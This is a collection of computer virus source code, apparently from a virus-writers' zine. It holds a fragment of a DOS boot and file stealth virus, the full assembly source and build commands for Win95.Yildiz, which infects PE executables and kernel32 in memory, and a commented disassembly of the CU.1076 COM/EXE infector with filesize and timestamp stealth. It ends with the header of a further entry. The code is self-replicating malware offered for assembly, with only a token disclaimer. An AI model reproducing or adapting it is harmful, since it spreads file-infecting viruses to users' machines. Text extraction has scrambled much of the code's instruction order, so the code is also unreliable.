AX, 5700h Do_Old_Int21h

; Get file's date & time.

CALL

Check_60_Secs

; Check if it's infected.

JNE

JMP_Old_Int21h

; If it ain't then get out.

OR JNZ

AL, AL Stealth_Set

; Get file date & time? ; Else it's a set.

CALL

Do_Old_Int21h

; Do the call.

AND JMP

CL, 11100000b IRET_Flags

; Clear seconds.

OR

CL, (62/2)

; Set 60 seconds.

JNZ

JMP_Old_Int21h

; This jump is always taken.

PUSHF CALL

DWORD PTR CS:Old_Int21h

AX CX

POP CX POP AX POP DX POP CX POP AX

Stealth_Set: DEC CX

Do_Old_Int21h:

; Simulate an interrupt 21h.

RETN JMP_Old_Int21h: JMP

DWORD PTR CS:Old_Int21h

Host_Header: DB DB 22 DUP (0)

0CDh, 20h

; This ISR stealths the first INT 12h and then unhooks itself, this way ; MEM and CHKDSK will report the untouched total DOS memory size. New_Int12h: PUSH DS PUSH ES PUSH BX XOR MOV

AX, AX DS, AX

LES

BX, DWORD PTR CS:Old_Int12h

CLI

; DS = IVT.

; Restore original INT 12h.

MOV MOV STI

DS:[(12h*4)], BX DS:[(12h*4)+2], ES

POP POP POP

BX ES DS

INT

12h

; Do the original INT 12h.

ADD

AX, Virus_Size_1024

; Stealth DOS memory size.

IRET DB =

'10/23/92', 0 BYTE PTR $-1

CMP JE

AX, 0EEE7h Return_ID_2

; Residency check?

CMP JE

AX, 3513h Get_Int13h_St

; Get INT 13h ?

CMP JE

AX, 3521h Get_Int21h_St

; Get INT 21h ?

CMP JE

AX, 2513h Set_Int13h_St

; Set INT 13h ?

CMP JE

AX, 2521h Set_Int21h_St

; Set INT 21h ?

JMP

DWORD PTR CS:600h+(Old_Int21h-File_Int21h)

Return_ID_2:

MOV IRET

AX, 0D703h

Get_Int13h_St:

LES IRET

BX, DWORD PTR CS:600h+(Old_Int13h-File_Int21h)

Get_Int21h_St:

LES IRET

BX, DWORD PTR CS:600h+(Old_Int21h-File_Int21h)

Set_Int13h_St:

MOV MOV IRET

CS:600h+(Old_Int13h-File_Int21h), DX CS:600h+(Old_Int13h-File_Int21h)+2, DS

Set_Int21h_St:

MOV MOV IRET

CS:[600h+(Old_Int21h-File_Int21h)], DX CS:[600h+(Old_Int21h-File_Int21h)+2], DS

Act_Partition

DW

0

CMP JNE

DX, 80h JMP_Boot_i13h

; 1st HD - head zero?

CMP JNB

CX, Virus_Size_512+2 JMP_Boot_i13h

; Operation concerns the ; MBS or virussectors?

Origin File_Int21h:

; Return ID word to caller.

Boot_Int13h:

CMP JE

AH, 02h Check_For_MBS

; Sector read?

CMP JE

AH, 03h Check_For_MBS

; Sector write?

JMP_Boot_i13h: Ofs_Old_Int13h

JMP =

DWORD PTR CS:[0000h] WORD PTR $-2

; Jump to the previous ISR.

Check_For_MBS:

CMP JNE

CX, 1 Check_If_Write

; It's the MBS ?

CMP JE

AH, 02h Do_Read_Write

; It is a MBS read? ; Else it's a write.

PUSH

SI

CALL

Get_Act_Partition

; Get delta offset to active ; partition.

MOV

ES:[BX+SI], 0200h

; Set the infected partition ; in the MBS so the written ; MBS will still be infected.

POP

SI

PUSH

AX

MOV

AL, 1

Do_Read_Write:

PUSHF CALL DWORD PTR CS:[0] Ofs_Real_Int13h = WORD PTR $-2

; Only read/write to the MBS. ; Carry out the read/write.

POP AX CMP JE

AH, 03h Success_IRET

; It was a write?

PUSH

SI

; Else stealth the read.

CALL

Get_Act_Partition

MOV

ES:[BX+SI], 0101h

CMP JE

AL, 1 Success_IRET

Check_If_Write: CMP JE

AH, 03h Success_IRET

; Put back the original ; MS-DOS partition start.

POP SI

PUSH PUSH PUSH PUSH

; It was a write?

AX CX DX DI XOR

AH, AH

MOV

DI, BX

CMP MOV

CX, 1 CX, 512

; ES:DI = readbuffer.

Calc_Sec_Size:

Clear_Buffer:

JNE

Calc_Sec_Size

DEC ADD

AX DI, CX

; Skip the MBS. ; Next sector.

MUL

CX

; Sectorcount * 512.

OR JZ

DX, DX Clear_Buffer

MOV

CX, 0

XCHG

CX, AX

CLD Clear_Byte:

POP POP POP POP

STOSB LOOP

Clear_Byte

DI DX CX AX

Success_IRET:

IRET_Flags:

PUSH

CLC

; Mark success. *** The next ; XOR clears CF already.

XOR

AH, AH

PUSH LAHF

AX

BP MOV

BP, SP

MOV

[BP+(4*2)], AH

; Set new flags in stack.

POP BP POP AX IRET

; Get's the active partition. Get_Act_Partition:

Get_Delta_2:

CALL POP SUB

Get_Delta_2 SI SI, OFFSET Get_Delta_2

MOV

SI, CS:[SI+Act_Partition]

= = = = = = = = =

WORD WORD WORD WORD WORD WORD $+20 WORD WORD

RETN End_Body: Old_Int08h Old_Int21h Old_Int01h Old_Int12h Old_Int13h Real_Int13h Buffer Read_Count Host_Size

PTR PTR PTR PTR PTR PTR

$+0 $+4 $+8 $+8 $+12 $+16

PTR $+44 PTR $+44

New_Read_Count File_Pos Host_Type Orig_Size Valid_Handle File_Handle

= = = = = =

WORD WORD BYTE WORD BYTE BYTE

PTR PTR PTR PTR PTR PTR

EXE_Header EXE_ID Image_Mod_512 File_512_Pages Reloc_Items Header_Size Min_Size_Mem Max_Size_Mem Program_SS Program_SP Checksum Program_IP Program_CS Reloc_Table EXE_Header

STRUC DW DW DW DW DW DW DW DW DW DW DW DW DW ENDS

0 0 0 0 0 0 0 0 0 0 0 0 0

Find_FN_FCB FCB_Drive FCB_Name FCB_Ext FCB_Attr FCB_Reserved FCB_Time FCB_Date FCB_Start_Clust FCB_Size Find_FN_FCB

STRUC DB DB DB DB DB DW DW DW DW ENDS

0 8 DUP(0) 3 DUP(0) 0 10 DUP(0) 0 0 0 0, 0

END

START

$+46 $+48 $+49 $+52 $+56 $+57

; ************************************************************************* ; ******************** ******************** ; ******************** Win95.Yildiz ******************** ; ******************** by ******************** ; ******************** Black Jack ******************** ; ******************** ******************** ; ************************************************************************* ; ; ;NAME: Win95.Yildiz ;AUTHOR: Black Jack [independant Austrian Win32asm virus coder] ;CONTACT: [email protected] | http://www.coderz.net/blackjack ;TYPE: Win9x direct acting/global ring3 resident PE header cavity virus ;SIZE: 323 bytes (but of course infected files won't increase in size) ; ;DESCRIPTION: When an infected file is run, the virus takes control. It then ; tries to find the kernel32 base address by a simple algorithm ; which should make it compatible with Win9X and WinME (although I ; haven't tested it with the second one). After that it gets the ; undocumented Win9X API VxDCall0 and uses it to call int 21h. The ; VxDCall0 API is the very first exported API in Win9X; I don't ; know which API is first in WinNT, that's why unpredictable ; results may occur when the virus runs in that OS (I haven't tried ; it out, but of course the virus can't work in NT). ; Then it goes TSR (read more about this a bit later), and infects ; all PE EXE files in the current directory by overwriting the ; unused padding bytes in the PE header with the virus body. ; The memory residency consist in infecting kernel32.dll in memory. ; To do so, it creates a temporary file called "Yildiz." and writes ; the first 4KB of kernel32.dll there. Then this file is infected ; like any other PE file. And finally the content of the infected ; temp file is read back into kernel32 memory. Yep, you have read ; right, by using the int21h with VxDCall0 you can read from a file ; into read-only memory! (This trick was discovered by Murkry/IkX, ; read more about it in the comments to his Darkside virus source, ; published in Xine#3). ; As I have already said, the kernel32 is infected in memory just ; like any other file, this means the entry point is set to the ; virus, no APIs are hooked. As you should know, the entry point ; of a DLL is a init routine that is called whenever the DLL is ; loaded by a program. And since kernel32 is imported by all ; programs, this means for us that whenever a program is run (and ; kernel32 is mapped into the program's address space), our virus ; will infect all PE EXE files in the directory of the program. ; ;ASSEMBLE WITH: ; tasm32 /mx /m yildiz.asm ; tlink32 /Tpe /aa yildiz.obj,,, import32.lib ; ; there's no need for PEWRSEC or a similar tool, because the ; virus code is supposed to run in read-only memory anyways. ; ;DISCLAIMER: I do *NOT* support the spreading of viruses in the wild. ; Therefore, this source was only written for research and ; education. Please do not spread it. The author can't be hold ; responsible for what you decide to do with this source. ; ===========================================================================

virus_size

EQU

(virus_end - virus_start)

Extrn MessageBoxA:Proc Extrn ExitProcess:Proc

; for first generation only

.386p .model flat .data dd 0

; dummy data, you know...

.code virus_start: pushad

; save all registers

xchg edi, eax

; put delta offset to EDI (EAX=start ; offset of program by default)

mov eax, [esp+8*4]

; EAX=some address inside kernel32

sub esp, size stack_frame mov esi, esp

; reserve room on stack ; set ESI to our data on the stack

search_kernel32: xor ax,ax cmp word ptr [eax], "ZM" JE found_kernel32 dec eax JMP search_kernel32 tmp_filename filespec

we assume the least significant word of the kernel32 base is zero is there a MZ header ? if yes, we found the correct kernel32 base address 0BFF80000->0BFF7FFFF, and then the least significant word is zeroed check next possible kernel32 base

db "Yildiz", 0 db "*.EXE", 0

found_kernel32: mov ebx, [eax+3Ch] add ebx, eax mov mov mov add mov lea

; ; ; ; ; ; ; ;

; EBX=kernel32 PE header RVA ; EBX=offset of kernel32 PE header

ebx, [ebx+120] ; ebx, [ebx+eax+1Ch] ; ebx, [ebx+eax] ; ebx, eax ; [esi.VxDCall0], ebx ; ebp, [edi+int21h-virus_start] ; ;

EBX=export table RVA EBX=Address array of API RVAs get the first API RVA: VxDCall0 EBX=Offset VxDCall0 API save it ; EBP=offset of our int21h procedure for optimisation reasons, the CALL EBP instruction is just 2 bytes

; ----- GO TSR -------------------------------------------------------------lea edx, [edi+tmp_filename-virus_start] ; EDX=pointer to tmp filename push edx ; save it on stack push eax

; save kernel32 base address on stack

mov ah, 3Ch xor ecx, ecx call ebp

; create temp file ; no attributes ; call our int 21h procedure

xchg ebx, eax

; filehandle to EBX, where it belongs

pop edx push edx

; EDX=kernel32 base address ; save it again

call write_file

; write start of kernel32 to temp file

call infect

; infect the temp file

pop edx

; EDX=kernel32 base address

mov ah, 3Fh call read_write

; read infected kernel32 fileststart ; into kernel32 memory

mov ah, 3Eh call ebp

; close temp file ; call our int 21h procedure

pop edx mov ah, 41h call ebp

; EDX=pointer to temp filename ; delete temp file ; call our int 21h procedure

; ----- INFECT ALL FILES IN CURRENT DIR ------------------------------------mov ah, 2Fh call ebp

; get DTA ; call our int 21h procedure

push es push ebx

; save DTA address to stack

push ds pop es

; ES=DS (standart data segment)

mov ah, 1Ah lea edx, [esi.dta] call ebp

; set DTA to our data area ; DS:EDX=new DTA adress ; call our int 21h procedure

mov ah, 4Eh ; find first file xor ecx, ecx ; only files with standart attributes lea edx, [edi+(filespec-virus_start)] ; EDX=offset of filespec findfile_loop: call ebp JC all_done

; call our int 21h procedure ; no more files found?

mov ax, 3D02h lea edx, [esi.dta+1Eh] call ebp

; open victim file for read and write ; DS:EDX=pointer to filename in DTA ; call our int 21h procedure

xchg ebx, eax

; handle to EBX, where it belongs

call infect

; infect the file

mov ah, 3Eh call ebp

; close the victim file ; call our int 21h procedure

search_on: mov ah, 4Fh JMP findfile_loop

; find next file

; ----- RESTORE HOST -------------------------------------------------------all_done: pop edx pop ds mov ah, 1Ah call ebp

; restore old DTA offset in DS:EDX ; reset DTA to old address ; call our int 21h procedure

push es pop ds

; DS=ES (standart data segment)

add esp, size stack_frame

; remove our data buffer from stack

popad

; restore all registers

db 05h ; add eax, imm32 entry_RVA_difference dd (host-virus_start) ; difference between host and ; virus entrypoint (EAX is virus ; entrypoint offset by default) JMP eax ; jump to host entrypoint ; ----- END MAIN PART OF THE VIRUS CODE ------------------------------------exit_infect: pop edi RET

; restore EDI (delta offset) ; return to caller

; ----- INFECT AN OPENED FILE (HANDLE IN BX) -------------------------------infect: push edi

; save EDI (delta offset)

mov edx, esi mov ah, 3Fh call read_write

; EDX=read/write buffer offset ; read start of file

cmp word ptr [esi], "ZM" JNE exit_infect

; is it an exe file ? ; cancel infection if not

mov ecx, [esi+3Ch] cmp ecx, 3*1024

; ; ; ; ;

ECX=new header RVA check if DOS stub is small enough so that all the PE header is in our buffer if not, cancel infection

; ; ; ; ; ; ;

EDI=PE header offset in memory is it an PE file ? (I know that the PE marker is actually a dword, but by only checking one word we save a byte of virus code) cancel infection if not

; ; ; ;

check if entrypoint RVA is in the first 4 KB of the file if yes, the file must be already infected, cancel infection

add ecx, 24 movzx eax, word ptr [edi+14h] add ecx, eax movzx eax, word ptr [edi+6] imul eax, eax, 40 add ecx, eax

; ; ; ; ; ; ; ;

add size of FileHeader EAX=size of Optional header add it to ECX EAX=NumberOfSections get size of section headers to EAX add it to ECX, now it points to the end of the used part of the PE header, where the virus will be.

mov edx, ecx xchg dword ptr [edi+28h], edx sub edx, ecx

; ; ; ;

EDX=virus RVA set it as new entrypoint RVA EDX=difference between old and new entrypoint RVA

JA exit_infect lea edi, [esi+ecx] cmp word ptr [edi], "EP"

JNE exit_infect cmp dword ptr [edi+28h], 4096 JB exit_infect

mov eax, [edi+54h]

; EAX=SizeOfHeaders (aligned to ; FileAlign)

lea edi, [esi+ecx]

; EDI=virus offset in buffer

sub eax, ecx mov cx, virus_size cmp eax, ecx JL exit_infect

; ; ; ; ;

pop eax push eax xchg esi, eax

; EAX=delta offset ; save it again to stack ; ESI=delta offset, EAX=data buffer

cld rep movsb

; clear direction flag ; move virus body into buffer

xchg esi, eax

; ESI=pointer to our data on stack

EAX=free room for us to use ECX=size of virus (the most significant word of ECX should be 0) enough room for the virus ? cancel infection if not

mov [edi-(virus_end-entry_RVA_difference)], edx ; store difference ; between old and new entrypoint pop edi

; restore EDI (delta offset)

mov edx, esi

; EDX=offset of read/write buffer ; now write modified start of file, ; then return to caller

write_file: mov ah, 40h

; write to file

read_write: xor ecx, ecx pushad

; ECX=0 ; save all registers

xor eax, eax mov ah, 42h cdq call ebp

; ; ; ;

EAX=4200h (set filepointer from start of the file CX:DX=0 (new filepointer) call our int 21h procedure

popad

; restore all registers

mov ch, 10h

; ECX=4096 (size of read/write buffer) ; now execute int 21h and return

int21h: push push push call ret

ecx eax 2A0010h ss:[esi.VxDCall0]

; protected mode int21 ; push parameters ; VWIN32_Int21Dispatch function ; call VxDCall0 API

virus_end: ; This is our data that will be stored on the stack: stack_frame buffer dta

struc db 4096 dup(?) db 43 dup(?)

VxDCall0 stack_frame

dd ? ends

host: push push push push call

0 offset caption offset message 0 MessageBoxA

push 0 call ExitProcess caption db "Win95.Yildiz Virus (c) 2000 Black Jack", 0 message db "first generation dropper", 0 end virus_start

comment \ Name

: : Author : Type : Size : Origin : When : Status : Disassembled by :

CU.1076 (according to AVP, obviously named after infection marker in CRC field of EXE header. ? TSR EXE/COM infector with sizestealth 1076 bytes ? ? ? Black Jack

Description: When an infected file is executed, the virus gains control and goes TSR by the standart MCB method and hooks int21h. It then infects COM and EXE files when they are executed or loaded by function 4Bh. The infection process is 100% standart. Date, Time and Attributes are stored (except that the seconds filed holds the infection mark 60), and a dummy int24h is installed during infection. Also, the virus uses size stealth for FCB (functions 11h, 12h) handle (functions 4Eh, 4Fh) and Win95 (functions 714Eh, 714Fh), although the handle stealth won't work because of lots of bugs. Also it has a kind of time-stealth, on the get time function (5700h) it returns the seconds field of the last infected file to hide its infection mark. Comments: This is just a stupid and boring DOS virus, I just disassembled it because of great boredom and because I had found an infected file on my mothers PC (but please don't ask me how it came there). Its full of bugs and rubbish. Reassembly tested with Tasm 3.1 and TLink 3.0 . TASM /M cu TLINK /t cu \

virus_size

=

(v_end - v_start)

.model tiny .286 .code org 100h start: nop nop nop

v_start: push call next: pop sub

; dummy host

es

; save PSP segment

next

; calculate delta offset

bp bp,offset next

; BP=delta offset

mov int cmp je

ax,1818h 21h bx,0C001h already_resident

; already resident?

mov

ax,ds

; AX=PSP segment

; yes, we're there

dec mov

ax ds,ax mov cl,"M" xchg ds:[0],cl sub word ptr ds:[3],40h sub word ptr ds:[12h],40h mov bx,ds:[12h] mov ds,bx inc bx mov es,bx mov ds:[0],cl mov word ptr ds:[1],8 mov word ptr ds:[3],3Fh

; AX=MCB segment ; DS=MCB segment ; marker: not the last MCB ; mark our MCB as not the last ; resize MCB ; end segment of this program ; BX=segment of new virus MCB ; DS=segment of new virus MCB ; BX=segment of the virus ; ES=segment of the virus ; marker of virus MCB ; mark as system MCB ; set virus segment size in MCB

push pop xor lea mov cld rep

cs ds di,di si,[bp+v_start] cx,virus_size

; DS=CS

push

es

; save virus segment

push pop

es ds

; DS=ES=virus segment

mov int

pop

movsb

; DI=0 ; SI=start of virus code ; CX=size of virus ; clear direction flag ; copy virus to TSR location

ax,3521h ; get int21h vector 21h mov ds:[int21h_offset-v_start],bx ; save it mov ds:[int21h_segment-v_start],es es

; ES=virus segment

mov

ax,2521h ; set new int21h vector mov dx,(int21h_handler-v_start) ; DS:DX=new int handler int 21h already_resident: pop es push cs pop ds cmp je

cs:[bp+host_type],"XE" restore_exe

restore_com: lea si,[bp+header] mov di,100h cld movsw movsb push pop push ret

es ds 100h

restore_exe: mov ax,es add ax,10h push es pop ds

; ES=PSP segment ; DS=CS

; is host an EXE?

; original first bytes of host ; clear direction flag ; move start of host back

; DS=ES=PSP segment ; jump to host start

; AX=ES=PSP segment ; AX=start segment of image ; DS=ES=PSP segment

add add mov mov

word ptr cs:[bp+host_cs],ax ax,word ptr cs:[bp+host_ss] ss,ax sp,word ptr cs:[bp+host_sp]

db host_ip host_cs

0EAh

host_ss host_sp

; ; ; ;

relocate jump to host relocate host SS restore host SS restore host SP

; jmp far opcode dw dw

? ?

dw dw

? ?

int21h_handler: cmp ax,1818h jne no_residency_check mov bx,0C001h iret no_residency_check: cmp ah,4Bh jne no_exec jmp infect

; residency check ; we're already installed ; quit interrupt execution

; load/execute file

no_exec: cmp je cmp je

ah,11h fcb_stealth ah,12h fcb_stealth

cmp ah,4Eh jne no_findfirst_handle jmp handle_stealth no_findfirst_handle: cmp ah,4Fh jne no_findnext_handle jmp short handle_stealth nop no_findnext_handle: cmp jb cmp ja jmp

ax,714Eh no_LFN_stealth ax,714Fh no_LFN_stealth LFN_stealth

no_LFN_stealth: cmp ax,5700h jne org_int21h jmp time_stealth org_int21h: db int21h_pointer int21h_offset int21h_segment

0EAh equ dw dw

; FCB find first file? ; FCB find next file?

; handle find first file?

; handle find next file?

; LFN find first file? ; LFN find next file?

; get file date/time? ; Jump if not equal

this dword ? ?

; ----- FCB STEALTH --------------------------------------------------------fcb_stealth: pushf ; simulate int21h call call dword ptr cs:[int21h_pointer-v_start] pushf

; save flags

pusha push push es

ds

; save all regs ; save segments

al,al exit_fcb_stealth

; FCB search failed? ; if so, quit stealth routine

ah,51h

; get active PSP segment to BX

mov cmp jne

es,bx bx,es:[16h] exit_fcb_stealth

; ES=active PSP segment ; is it COMMAND.COM calling? ; if not, don't do stealth

mov

ah,2Fh

; get DTA to ES:BX

es

; DS:BX=DTA

or jnz mov int

21h

int

21h push

pop

ds cwd

; DX=0

cmp byte ptr [bx],0FFh jne no_extended_fcb add bx,7 no_extended_fcb: mov cl,[bx+17h] and cl,00011111b cmp cl,1Dh jne exit_fcb_stealth mov mov

ax,[bx+9] cl,[bx+1Bh] ax,"OC" fcb_stealth_no_com cl,"M" exit_fcb_stealth short do_fcb_stealth

; is it an extended FCB? ; convert to regular FCB ; ; ; ;

CL=low byte of filetime CL=seconds seconds=60 means infected if not, then exit stealth routine

; AX:CL=file extension

cmp ; is it a COM file? jne cmp jne ; its not an EXE/COM jmp nop fcb_stealth_no_com: cmp ax,"XE" ; is it an EXE file? jne exit_fcb_stealth ; its not an EXE/COM cmp al,"E" jne exit_fcb_stealth ; its not an EXE/COM do_fcb_stealth: sub word ptr [bx+1Dh],virus_size ; stealth filesize sbb word ptr [bx+1Ch],0 ; stealth filesize exit_fcb_stealth: pop es pop ds popa popf retf 2

; restore setment registers ; restore all regs ; restore flags ; return from INT and keep the flags

; ----- HANDLE STEALTH -----------------------------------------------------; note: this routine is much to buggy to work. handle_stealth: pushf ; push flags call dword ptr cs:[int21h_pointer-v_start] jc findfirstnext_failed

pushf pusha push push es push mov int

ds

; save flags ; save all registers ; save segment registers

di

; save DI (useless)

ah,2Fh

; get DTA to ES:BX

21h ; BUG! DS should be set to ES here!!! mov and cmp jne

cl,[bx+16h] cl,00011111b cl,1Dh exit_handle_stealth

; CL=low byte of filetime ; CL=seconds of filetime ; seconds=60 means infected

push lea call pop

si si,[bx+1Eh] get_extension si

; ; ; ;

save SI (useless) ES:SI=filename get file extension to AX:CL restore SI

cmp jne cmp jne jmp nop

ax, "OC" handle_stealth_no_com cl,"M" exit_handle_stealth short do_handle_stealth

; ; ; ;

could it be a COM file? check for an EXE really a COM? if not, exit stealth routine

; ; ; ;

could it be an EXE file? no EXE/COM, leave stealth routine really an EXE? no EXE/COM, leave stealth routine

handle_stealth_no_com: cmp ax,"XE" jne exit_handle_stealth cmp cl,"E" jne exit_handle_stealth

do_handle_stealth: sub word ptr es:[bx+1Ah],virus_size ; fixup filesize ; BUG! hiword of filesize unchanged!!! exit_handle_stealth: pop di pop es pop ds popa popf findfirstnext_failed: retf 2

; restore DI ; restore segment registers ; restore all registers ; restore flags

; return from INT and keep the flags

; ----- LONG FILENAME (WIN95) STEALTH --------------------------------------LFN_stealth: pushf ; simulate int21h call call dword ptr cs:[int21h_pointer-v_start] ; ES:DI=finddata structure pushf pusha push push es jc nop nop

ds

; save flags ; save all regs ; save segments

exit_lfn_stealth

; exit on error

push pop

es

; DS=ES

ax,si ax,1 dos_datetime_format

; SI=DateTimeFormat ; 1 means DOS format for date/time

ds mov cmp je

nop nop mov ax,71A7h ; convert date/time format xor bl,bl ; BL=0: Win95 format to DOS format mov si,di add si,14h ; DS:SI=ptr to filetime pushf ; simulate int21h call call dword ptr cs:[int21h_pointer-v_start] ; return CX=filetime, DX=filedate jmp short filetime_in_CX nop ; stupid single-pass assembler dos_datetime_format: mov cx,es:[di+14h] filetime_in_CX: and cl,00011111b cmp cl,1Dh jne exit_lfn_stealth nop nop

; get filetime in CX ; CL=file seconds ; seconds=60 means infected ; if not, exit stealth routine

push lea call pop

si si,[di+2Ch] get_extension si

; ; ; ;

save SI (useless) DS:SI=filename ptr get filename extension to AX:CL restore SI

cmp jne

ax,"OC" lfn_stealth_no_com

; could it be a COM file? ; not a COM

cmp jne

cl,"M" exit_lfn_stealth

; really a COM? ; no COM/EXE, leave stealth routine

jmp nop

short do_lfn_stealth

nop nop

nop nop

lfn_stealth_no_com: cmp ax,"XE" jne exit_lfn_stealth nop nop cmp cl,"E" jne exit_lfn_stealth nop nop

; could it be an EXE file? ; if not, leave stealth routine.

; is it really an EXE? ; no COM/EXE, leave stealth routine

do_lfn_stealth: sub word ptr es:[di+20h],virus_size ; fixup filesize sbb word ptr es:[di+22h],0 exit_lfn_stealth: pop es pop ds popa popf retf 2

; restore segment registers ; restore all registers ; restore flags ; return from INT and keep the flags

; ----- GET THE FILE EXTENSION ---------------------------------------------get_extension: lodsb ; get a char from filename cmp al,"." ; end of filename? jne get_extension ; if not, search on cld lodsw xchg cld lodsb xchg ret

cx,ax

cx,ax

; ; ; ; ; ;

clear direction - useless here get first 2 bytes of extension to AX move them to CX clear direction - useless again get last byte of extension to AL AX:CL=file extension

; ----- TIME STEALTH -------------------------------------------------------time_stealth: pushf ; Push flags call dword ptr cs:[int21h_pointer-v_start] pushf pusha push push es

ds

; save flags ; save all registers ; save segment registers

and cl,00011111b ; CL=seconds of filetime cmp cl,1Dh ; seconds=60 means infected jne no_time_stealth and cx,11100000b ; clear seconds of filetime add cl,byte ptr cs:[seconds-v_start] ; set new seconds field no_time_stealth: pop es ; restore segment registers pop ds popa ; restore all registers popf ; restore flags retf 2 ; return from INT and keep the flags

; ----- INFECTION ----------------------------------------------------------infect: pusha ; save all registers push ds ; save also segment registers push es push xor mov

ds ; save DS (segm to filename) ax,ax ; AX=0 ds,ax ; DS=AX=0=IVT segment mov ax, offset int24h_handler ; BUG! forgotten to sub v_start mov bx,cs ; BX:AX=ptr32 to int24h handler cli ; disable interrupts xchg ds:[24h*4],ax ; set new handler to int24h xchg ds:[24h*4+2],bx mov word ptr cs:[int24h_offset-v_start],ax ; save old mov word ptr cs:[int24h_segment-v_start],bx ; handler sti ; enable interrupts pop ds ; restore DS (filename segm) mov int

ax,4300h 21h

; get attributes of victim

push push

dx ds

; save filename pointer of ; victim file

push

cx

; save attributes of victim

mov xor int jnc jmp

ax,4301h cx,cx 21h get_attributes_ok reset_attributes

; reset attributes of victim ; CX=new attributes=0

get_attributes_ok: mov ax,3D02h int 21h jnc openfile_ok jmp reset_attributes openfile_ok: xchg bx,ax

; open file r/w ; DS:DX=filename ptr

; filehandle to BX

push push pop pop

cs cs ds es

; DS=ES=CS

mov int push push

ax,5700h 21h cx dx

; get file date/time

mov mov mov int

; save file time ; save file date

ah,3Fh ; read file header dx, (header-v_start) ; DS:DX=buffer to read cx,1Ch ; DOS EXE header size 21h

cmp word ptr cs:[header-v_start],"MZ" jne probably_not_an_exe jmp infect_exe probably_not_an_exe: cmp word ptr cs:[2AEh],"ZM" jne not_an_exe jmp infect_exe not_an_exe: cmp word ptr cs:[header-v_start], -1 jne infect_com jmp restore_filetime header

db

1Ch dup(0C3h)

infect_com: mov ax,4202h xor cx,cx cwd int 21h

; EXE header?

; EXE header?

; SYS file?

; 0C3h - ret opcode - quit 1st gen

; goto end of file ; CX:DX=0=distance to move

cmp dx,0 ; high word of filesize=0 ? jbe com_size_ok ; if yes, file is too big jmp restore_filetime ; to infect com_size_ok: push ax ; save filesize sub ax,(virus_size+3) ; the theoretical offset of ; the jmp if file was infected cmp ax,word ptr cs:[header-v_start+1] ; equal means ; the file is already infected pop ax ; restore filesize in AX jne com_not_infected_yet

jmp restore_filetime com_not_infected_yet: mov word ptr cs:[host_type-v_start],"OC" ; set host type sub ax,3 mov word ptr cs:[jmp_distance-v_start],ax add ax,3 ; completely useless instruction mov mov mov int

ah,40h dx,0 cx,virus_size 21h

; write virus body ; virus offset in memory ; CX=size to write

mov xor cwd int

ax,4200h cx,cx

; set filepointer to beginning ; CX:DX=distance to move=0

21h

mov mov mov int pop pop push and mov pop and add jmp

ah,40h ; write new jump to filestart dx,(new_jmp-v_start) ; DS:DX=ptr to buffer cx,3 ; write three bytes (near jmp) 21h dx ; restore old file date in DX cx ; restore old file time in CX cx ; save CX again cl,00011111b ; CL=seconds from filetime byte ptr cs:[seconds-v_start],cl ; store it cx ; restore CX cl,11100000b ; clear seconds from filetime cl,1Dh ; mark as infected with seconds=60 set_filetime ; set new filetime

new_jmp: db jmp_distance

0E9h dw

?

infect_exe: cmp word ptr cs:[header-v_start+18h],40h jb no_new_exe jmp restore_filetime no_new_exe: cmp word ptr cs:[header-v_start+1Ah],0 je no_overlay jmp restore_filetime no_overlay: cmp word ptr cs:[header-v_start+12h],"UC" jne not_infected_yet jmp restore_filetime not_infected_yet: mov word ptr cs:[host_type-v_start],"XE" mov mov mov mov mov mov mov mov mov xor

ax,word ptr cs:[header-v_start+0Eh] cs:[host_ss - v_start],ax ax,word ptr cs:[header-v_start+10h] cs:[host_sp - v_start],ax ax,word ptr cs:[header-v_start+16h] cs:[host_cs - v_start],ax ax,word ptr cs:[header-v_start+14h] cs:[host_ip - v_start],ax ax,4202h cx,cx

; Relo table address ; don't take New EXEs ; Overlay number ; don't take overlays ; CRC/infection mark ; don't reinfect ; mark host as EXE ; save SS ; save SP ; save CS ; save IP

; go to end of file ; DX:CX=new file pointer

cwd int

21h push push push

bx ax dx

mov shl sub

bx,word ptr cs:[header-v_start+08h] ; header size (paras) bx,4 ; BX=BX*16 : convert to bytes ax,bx ; DX:AX=image size

sbb

; save file handle ; save filesize ; save filesize high

dx,0 mov div

mov mov mov mov

cx,10h ; divide by 16 cx ; calculate new word ptr cs:[header-v_start+14h],dx word ptr cs:[header-v_start+16h],ax word ptr cs:[header-v_start+0eh],ax word ptr cs:[header-v_start+10h],0FFFEh mov word ptr cs:[header-v_start+12h],"UC" pop

pop

CS/IP ; IP ; CS ; SS ; SP ; CRC/marker

dx

; restore filesize to DX:AX

ax,virus_size

; calculate new filesize

ax add

adc

dx,0 mov div inc mov mov

cx,200h ; calculate filesize in 512 byte pages cx ax ; round up pages word ptr cs:[header-v_start+4],ax ; filesize mod 512 word ptr cs:[header-v_start+2],dx ; filesize div 512

pop

bx

; restore file handle

mov mov mov

ah,40h cx,virus_size dx,0

; write virus to EOF file ; size to write ; virus offset in memory

ax,4200h cx,cx

; go to start of file ; DX:CX=new position in file=0

ah,40h dx, (header-v_start) cx,1Ch

; write new EXE header ; DS:DX=buffer to read ; DOS EXE header size

int

21h mov xor

cwd int

21h mov mov mov

int

21h

pop pop push and mov pop and add jmp nop

dx ; restore old file date in DX cx ; restore old file time in CX cx ; save CX again cl,00011111b ; CL=seconds from filetime byte ptr cs:[seconds-v_start],cl ; store it cx ; restore CX cl,11100000b ; clear seconds from filetime cl,1Dh ; mark as infected with seconds=60 set_filetime ; set new filetime ; single-pass assembler shit

int24h_handler: iret int24h_offset

; Interrupt return dw

?

int24h_segment

dw

?

restore_filetime: pop dx pop cx

; restore old file date in DX ; restore old file time in CX

set_filetime: mov ax,5701h int 21h mov int

; set file time/date

ah,3Eh 21h mov

int

; close file

ax,5700h

; get file time/date

21h

reset_attributes: pop cx pop ds pop dx mov ax,4301h int 21h xor mov

cli mov mov sti

; ; ; ;

restore old file attributes restore pointer to filename in DS:DX set file attributes funct.

ax,ax ; AX=0 ds,ax ; DS=AX=0=IVT segment mov ax,word ptr cs:[int24h_offset-v_start] ; BX:AX=ptr32 to old mov bx,word ptr cs:[int24h_segment-v_start] ; int24h handler ; disable interrupts ds:[24h*4],ax ; restore old int24h handler ds:[24h*4+2],bx ; enable interrupts

pop pop popa jmp

es ds

; restore segment registers ; restore all other registers

org_int21h

host_type seconds v_end: end

dw db

start

"OC" 0

; first generation is a COM

comment % Name Alias Author Type Size

: : : : :

Origin : When : Status : Disassembled by : Contact me :

Win.Tentacle_II Shell ? direct acting Win16 NE appender 10608 bytes virus body (because of relocation stuff infected files increase for at least 10634 bytes) ? 1996 was in the wild (distributed in sex newsgroups in 1996) Black Jack [email protected] | http://www.coderz.net/blackjack

